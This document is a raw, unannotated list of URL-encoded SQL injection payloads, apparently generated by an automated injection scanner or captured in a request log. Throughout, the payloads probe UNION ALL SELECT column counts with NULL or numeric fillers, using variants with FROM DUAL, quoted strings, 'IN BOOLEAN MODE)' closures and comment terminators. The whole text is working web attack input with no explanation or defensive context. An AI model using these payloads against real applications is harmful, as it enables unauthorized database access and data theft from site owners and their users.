1%20%2B%20%28SELECT%204697%20WHERE%203824%3D3824%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%209796%20WHERE%208570%3D8570%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%202820%20WHERE%209839%3D9839%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%206872%20WHERE%202494%3D2494%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%203721%20WHERE%206063%3D6063%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%205712%20WHERE%202639%3D2639%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%27%20%2B%20%28SELECT%20%27kVEu%27%20FROM%20DUAL%20WHERE%203650%3D3650%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27GDez%27%20FROM%20DUAL%20WHERE%203980%3D3980%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27FaKv%27%20FROM%20DUAL%20WHERE%201112%3D1112%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27rZEe%27%20FROM%20DUAL%20WHERE%205197%3D5197%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27imhD%27%20FROM%20DUAL%20WHERE%209510%3D9510%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27vyvd%27%20FROM%20DUAL%20WHERE%205909%3D5909%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27WcVP%27%20FROM%20DUAL%20WHERE%203347%3D3347%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27NZMt%27%20FROM%20DUAL%20WHERE%201911%3D1911%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27wseo%27%20FROM%20DUAL%20WHERE%207587%3D7587%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27VthK%27%20FROM%20DUAL%20WHERE%207868%3D7868%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27nTMP%27%20WHERE%201336%3D1336%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27VoPJ%27%20WHERE%203113%3D3113%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27yECq%27%20WHERE%207339%3D7339%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27eNkW%27%20WHERE%205635%3D5635%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ZoER%27%20WHERE%205240%3D5240%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27mRKS%27%20WHERE%201667%3D1667%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27WPhv%27%20WHERE%208991%3D8991%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27USfl%27%20WHERE%208622%3D8622%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ciVu%27%20WHERE%202742%3D2742%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27lmyV%27%20WHERE%206800%3D6800%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 -1217%29%20UNION%20ALL%20SELECT%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%23 -9125%29%20UNION%20ALL%20SELECT%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%23 -5747%29%20UNION%20ALL%20SELECT%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%2C%207100%23 -4020%29%20UNION%20ALL%20SELECT%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%23 -7190%29%20UNION%20ALL%20SELECT%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%2C%205634%23 -7100%29%20UNION%20ALL%20SELECT%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%2C%203807%23 -9536%29%20UNION%20ALL%20SELECT%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%23 -2323%29%20UNION%20ALL%20SELECT%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%2C%205559%23 -9343%29%20UNION%20ALL%20SELECT%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%2C%205426%23 -3760%29%20UNION%20ALL%20SELECT%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%23 